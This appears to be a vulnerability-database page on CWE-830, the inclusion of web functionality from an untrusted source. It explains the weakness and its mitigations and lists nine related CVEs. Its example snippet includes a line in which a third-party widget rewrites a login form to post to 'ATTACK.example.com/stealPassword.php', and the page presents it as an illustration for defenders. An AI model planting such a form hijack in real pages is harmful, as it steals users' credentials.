9 vulnerabilities classified as CWE-830 (从非可信源包含Web功能例程). AI Chinese analysis included.
CWE-830 represents a critical security weakness where an application integrates web functionality, such as widgets or scripts, from an untrusted external domain. This vulnerability typically arises when developers embed third-party code without adequate isolation, allowing the external source to execute within the application’s own security context. Attackers exploit this by compromising the untrusted source or injecting malicious code, thereby gaining unauthorized access to sensitive data, session tokens, or full control over the application’s interface and logic. To mitigate this risk, developers must enforce strict content security policies, utilize sandboxing techniques like iframes with specific attributes, and validate all external sources. Regular audits of third-party dependencies and implementing strict cross-origin resource sharing policies further ensure that external functionality remains isolated and cannot compromise the integrity of the primary application.
<div class="header"> Welcome! <div id="loginBox">Please Login: <form id ="loginForm" name="loginForm" action="login.php" method="post"> Username: <input type="text" name="username" /> <br/> Password: <input type="password" name="password" /> <input type="submit" value="Login" /> </form> </div> <div id="WeatherWidget"> <script type="text/javascript" src="externalDomain.example.com/weatherwidget.js"></script> </div> </div>...Weather widget code.... document.getElementById('loginForm').action = "ATTACK.example.com/stealPassword.php";| CVE ID | Title | CVSS | Severity | Published |
|---|---|---|---|---|
| CVE-2025-65109 | Minder does not sandbox http.send in Rego programs — minder | 4.3 | - | 2025-11-21 |
| CVE-2025-46652 | IZArc 安全漏洞 — IZArc | 6.1 | Medium | 2025-04-26 |
| CVE-2025-43703 | Anki 安全漏洞 — Anki | 6.1 | Medium | 2025-04-16 |
| CVE-2025-33027 | Bandisoft Bandizip 安全漏洞 — Bandizip | 6.1 | Medium | 2025-04-15 |
| CVE-2025-33026 | PeaZip 安全漏洞 — PeaZip | 6.1 | Medium | 2025-04-15 |
| CVE-2025-33028 | WinZip 安全漏洞 — WinZip | 6.1 | Medium | 2025-04-15 |
| CVE-2024-35180 | OMERO.web JSONP callback vulnerability — omero-web | 6.1 | Medium | 2024-05-21 |
| CVE-2023-2588 | Teltonika Remote Management System 安全漏洞 — Remote Management System | 8.8 | High | 2023-05-22 |
| CVE-2021-28162 | Eclipse Theia 注入漏洞 — Eclipse Theia | 6.1 | - | 2021-03-12 |
Vulnerabilities classified as CWE-830 (从非可信源包含Web功能例程) represent 9 CVEs. The CWE taxonomy describes the weakness; review individual CVEs for product-specific impact.